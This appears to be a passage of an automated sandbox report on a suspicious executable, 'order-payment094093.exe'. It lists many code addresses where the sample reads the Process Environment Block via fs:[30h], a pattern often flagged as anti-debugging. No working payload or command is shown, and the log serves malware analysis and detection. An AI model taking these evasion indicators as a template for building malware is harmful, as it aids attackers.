Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A8243 mov eax, dword ptr fs:[00000030h]	9_2_012A8243
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A8243 mov ecx, dword ptr fs:[00000030h]	9_2_012A8243
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121A250 mov eax, dword ptr fs:[00000030h]	9_2_0121A250
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226259 mov eax, dword ptr fs:[00000030h]	9_2_01226259
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DA250 mov eax, dword ptr fs:[00000030h]	9_2_012DA250
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DA250 mov eax, dword ptr fs:[00000030h]	9_2_012DA250
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B62A0 mov eax, dword ptr fs:[00000030h]	9_2_012B62A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B62A0 mov ecx, dword ptr fs:[00000030h]	9_2_012B62A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B62A0 mov eax, dword ptr fs:[00000030h]	9_2_012B62A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B62A0 mov eax, dword ptr fs:[00000030h]	9_2_012B62A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B62A0 mov eax, dword ptr fs:[00000030h]	9_2_012B62A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B62A0 mov eax, dword ptr fs:[00000030h]	9_2_012B62A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E284 mov eax, dword ptr fs:[00000030h]	9_2_0125E284
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E284 mov eax, dword ptr fs:[00000030h]	9_2_0125E284
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A0283 mov eax, dword ptr fs:[00000030h]	9_2_012A0283
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A0283 mov eax, dword ptr fs:[00000030h]	9_2_012A0283
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A0283 mov eax, dword ptr fs:[00000030h]	9_2_012A0283
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012302E1 mov eax, dword ptr fs:[00000030h]	9_2_012302E1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012302E1 mov eax, dword ptr fs:[00000030h]	9_2_012302E1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012302E1 mov eax, dword ptr fs:[00000030h]	9_2_012302E1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0122A2C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0122A2C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0122A2C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0122A2C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0122A2C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230535 mov eax, dword ptr fs:[00000030h]	9_2_01230535
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230535 mov eax, dword ptr fs:[00000030h]	9_2_01230535
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230535 mov eax, dword ptr fs:[00000030h]	9_2_01230535
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230535 mov eax, dword ptr fs:[00000030h]	9_2_01230535
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230535 mov eax, dword ptr fs:[00000030h]	9_2_01230535
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230535 mov eax, dword ptr fs:[00000030h]	9_2_01230535
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E53E mov eax, dword ptr fs:[00000030h]	9_2_0124E53E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E53E mov eax, dword ptr fs:[00000030h]	9_2_0124E53E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E53E mov eax, dword ptr fs:[00000030h]	9_2_0124E53E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E53E mov eax, dword ptr fs:[00000030h]	9_2_0124E53E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E53E mov eax, dword ptr fs:[00000030h]	9_2_0124E53E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B6500 mov eax, dword ptr fs:[00000030h]	9_2_012B6500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4500 mov eax, dword ptr fs:[00000030h]	9_2_012F4500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4500 mov eax, dword ptr fs:[00000030h]	9_2_012F4500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4500 mov eax, dword ptr fs:[00000030h]	9_2_012F4500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4500 mov eax, dword ptr fs:[00000030h]	9_2_012F4500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4500 mov eax, dword ptr fs:[00000030h]	9_2_012F4500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4500 mov eax, dword ptr fs:[00000030h]	9_2_012F4500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4500 mov eax, dword ptr fs:[00000030h]	9_2_012F4500
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125656A mov eax, dword ptr fs:[00000030h]	9_2_0125656A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125656A mov eax, dword ptr fs:[00000030h]	9_2_0125656A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125656A mov eax, dword ptr fs:[00000030h]	9_2_0125656A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228550 mov eax, dword ptr fs:[00000030h]	9_2_01228550
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228550 mov eax, dword ptr fs:[00000030h]	9_2_01228550
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A05A7 mov eax, dword ptr fs:[00000030h]	9_2_012A05A7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A05A7 mov eax, dword ptr fs:[00000030h]	9_2_012A05A7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A05A7 mov eax, dword ptr fs:[00000030h]	9_2_012A05A7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012445B1 mov eax, dword ptr fs:[00000030h]	9_2_012445B1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012445B1 mov eax, dword ptr fs:[00000030h]	9_2_012445B1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01222582 mov eax, dword ptr fs:[00000030h]	9_2_01222582
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01222582 mov ecx, dword ptr fs:[00000030h]	9_2_01222582
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01254588 mov eax, dword ptr fs:[00000030h]	9_2_01254588
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E59C mov eax, dword ptr fs:[00000030h]	9_2_0125E59C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012225E0 mov eax, dword ptr fs:[00000030h]	9_2_012225E0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0124E5E7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C5ED mov eax, dword ptr fs:[00000030h]	9_2_0125C5ED
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C5ED mov eax, dword ptr fs:[00000030h]	9_2_0125C5ED
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E5CF mov eax, dword ptr fs:[00000030h]	9_2_0125E5CF
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E5CF mov eax, dword ptr fs:[00000030h]	9_2_0125E5CF
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012265D0 mov eax, dword ptr fs:[00000030h]	9_2_012265D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0125A5D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0125A5D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121E420 mov eax, dword ptr fs:[00000030h]	9_2_0121E420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121E420 mov eax, dword ptr fs:[00000030h]	9_2_0121E420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121E420 mov eax, dword ptr fs:[00000030h]	9_2_0121E420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121C427 mov eax, dword ptr fs:[00000030h]	9_2_0121C427
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6420 mov eax, dword ptr fs:[00000030h]	9_2_012A6420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6420 mov eax, dword ptr fs:[00000030h]	9_2_012A6420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6420 mov eax, dword ptr fs:[00000030h]	9_2_012A6420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6420 mov eax, dword ptr fs:[00000030h]	9_2_012A6420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6420 mov eax, dword ptr fs:[00000030h]	9_2_012A6420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6420 mov eax, dword ptr fs:[00000030h]	9_2_012A6420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6420 mov eax, dword ptr fs:[00000030h]	9_2_012A6420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A430 mov eax, dword ptr fs:[00000030h]	9_2_0125A430
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01258402 mov eax, dword ptr fs:[00000030h]	9_2_01258402
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01258402 mov eax, dword ptr fs:[00000030h]	9_2_01258402
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01258402 mov eax, dword ptr fs:[00000030h]	9_2_01258402
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AC460 mov ecx, dword ptr fs:[00000030h]	9_2_012AC460
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124A470 mov eax, dword ptr fs:[00000030h]	9_2_0124A470
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124A470 mov eax, dword ptr fs:[00000030h]	9_2_0124A470
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124A470 mov eax, dword ptr fs:[00000030h]	9_2_0124A470
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E443 mov eax, dword ptr fs:[00000030h]	9_2_0125E443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DA456 mov eax, dword ptr fs:[00000030h]	9_2_012DA456
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121645D mov eax, dword ptr fs:[00000030h]	9_2_0121645D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124245A mov eax, dword ptr fs:[00000030h]	9_2_0124245A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012264AB mov eax, dword ptr fs:[00000030h]	9_2_012264AB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012544B0 mov ecx, dword ptr fs:[00000030h]	9_2_012544B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AA4B0 mov eax, dword ptr fs:[00000030h]	9_2_012AA4B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DA49A mov eax, dword ptr fs:[00000030h]	9_2_012DA49A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012204E5 mov ecx, dword ptr fs:[00000030h]	9_2_012204E5
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C720 mov eax, dword ptr fs:[00000030h]	9_2_0125C720
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C720 mov eax, dword ptr fs:[00000030h]	9_2_0125C720
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125273C mov eax, dword ptr fs:[00000030h]	9_2_0125273C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125273C mov ecx, dword ptr fs:[00000030h]	9_2_0125273C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125273C mov eax, dword ptr fs:[00000030h]	9_2_0125273C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129C730 mov eax, dword ptr fs:[00000030h]	9_2_0129C730
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C700 mov eax, dword ptr fs:[00000030h]	9_2_0125C700
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220710 mov eax, dword ptr fs:[00000030h]	9_2_01220710
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01250710 mov eax, dword ptr fs:[00000030h]	9_2_01250710
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228770 mov eax, dword ptr fs:[00000030h]	9_2_01228770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770 mov eax, dword ptr fs:[00000030h]	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125674D mov esi, dword ptr fs:[00000030h]	9_2_0125674D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125674D mov eax, dword ptr fs:[00000030h]	9_2_0125674D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125674D mov eax, dword ptr fs:[00000030h]	9_2_0125674D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220750 mov eax, dword ptr fs:[00000030h]	9_2_01220750
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262750 mov eax, dword ptr fs:[00000030h]	9_2_01262750
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262750 mov eax, dword ptr fs:[00000030h]	9_2_01262750
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AE75D mov eax, dword ptr fs:[00000030h]	9_2_012AE75D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A4755 mov eax, dword ptr fs:[00000030h]	9_2_012A4755
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012207AF mov eax, dword ptr fs:[00000030h]	9_2_012207AF
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D47A0 mov eax, dword ptr fs:[00000030h]	9_2_012D47A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C678E mov eax, dword ptr fs:[00000030h]	9_2_012C678E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012427ED mov eax, dword ptr fs:[00000030h]	9_2_012427ED
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012427ED mov eax, dword ptr fs:[00000030h]	9_2_012427ED
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012427ED mov eax, dword ptr fs:[00000030h]	9_2_012427ED
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AE7E1 mov eax, dword ptr fs:[00000030h]	9_2_012AE7E1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012247FB mov eax, dword ptr fs:[00000030h]	9_2_012247FB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012247FB mov eax, dword ptr fs:[00000030h]	9_2_012247FB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122C7C0 mov eax, dword ptr fs:[00000030h]	9_2_0122C7C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A07C3 mov eax, dword ptr fs:[00000030h]	9_2_012A07C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E627 mov eax, dword ptr fs:[00000030h]	9_2_0123E627
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01256620 mov eax, dword ptr fs:[00000030h]	9_2_01256620
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01258620 mov eax, dword ptr fs:[00000030h]	9_2_01258620
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122262C mov eax, dword ptr fs:[00000030h]	9_2_0122262C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E609 mov eax, dword ptr fs:[00000030h]	9_2_0129E609
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123260B mov eax, dword ptr fs:[00000030h]	9_2_0123260B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123260B mov eax, dword ptr fs:[00000030h]	9_2_0123260B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123260B mov eax, dword ptr fs:[00000030h]	9_2_0123260B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123260B mov eax, dword ptr fs:[00000030h]	9_2_0123260B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123260B mov eax, dword ptr fs:[00000030h]	9_2_0123260B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123260B mov eax, dword ptr fs:[00000030h]	9_2_0123260B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123260B mov eax, dword ptr fs:[00000030h]	9_2_0123260B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262619 mov eax, dword ptr fs:[00000030h]	9_2_01262619
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E866E mov eax, dword ptr fs:[00000030h]	9_2_012E866E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E866E mov eax, dword ptr fs:[00000030h]	9_2_012E866E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A660 mov eax, dword ptr fs:[00000030h]	9_2_0125A660
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A660 mov eax, dword ptr fs:[00000030h]	9_2_0125A660
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01252674 mov eax, dword ptr fs:[00000030h]	9_2_01252674
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123C640 mov eax, dword ptr fs:[00000030h]	9_2_0123C640
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C6A6 mov eax, dword ptr fs:[00000030h]	9_2_0125C6A6
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012566B0 mov eax, dword ptr fs:[00000030h]	9_2_012566B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01224690 mov eax, dword ptr fs:[00000030h]	9_2_01224690
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01224690 mov eax, dword ptr fs:[00000030h]	9_2_01224690
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0129E6F2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0129E6F2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0129E6F2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0129E6F2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A06F1 mov eax, dword ptr fs:[00000030h]	9_2_012A06F1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A06F1 mov eax, dword ptr fs:[00000030h]	9_2_012A06F1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A6C7 mov ebx, dword ptr fs:[00000030h]	9_2_0125A6C7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A6C7 mov eax, dword ptr fs:[00000030h]	9_2_0125A6C7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A892A mov eax, dword ptr fs:[00000030h]	9_2_012A892A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B892B mov eax, dword ptr fs:[00000030h]	9_2_012B892B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E908 mov eax, dword ptr fs:[00000030h]	9_2_0129E908
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E908 mov eax, dword ptr fs:[00000030h]	9_2_0129E908
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AC912 mov eax, dword ptr fs:[00000030h]	9_2_012AC912
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01218918 mov eax, dword ptr fs:[00000030h]	9_2_01218918
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01218918 mov eax, dword ptr fs:[00000030h]	9_2_01218918
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01246962 mov eax, dword ptr fs:[00000030h]	9_2_01246962
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01246962 mov eax, dword ptr fs:[00000030h]	9_2_01246962
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01246962 mov eax, dword ptr fs:[00000030h]	9_2_01246962
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0126096E mov eax, dword ptr fs:[00000030h]	9_2_0126096E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0126096E mov edx, dword ptr fs:[00000030h]	9_2_0126096E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0126096E mov eax, dword ptr fs:[00000030h]	9_2_0126096E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C4978 mov eax, dword ptr fs:[00000030h]	9_2_012C4978
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C4978 mov eax, dword ptr fs:[00000030h]	9_2_012C4978
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AC97C mov eax, dword ptr fs:[00000030h]	9_2_012AC97C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A0946 mov eax, dword ptr fs:[00000030h]	9_2_012A0946
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0 mov eax, dword ptr fs:[00000030h]	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012209AD mov eax, dword ptr fs:[00000030h]	9_2_012209AD
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012209AD mov eax, dword ptr fs:[00000030h]	9_2_012209AD
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A89B3 mov esi, dword ptr fs:[00000030h]	9_2_012A89B3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A89B3 mov eax, dword ptr fs:[00000030h]	9_2_012A89B3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A89B3 mov eax, dword ptr fs:[00000030h]	9_2_012A89B3
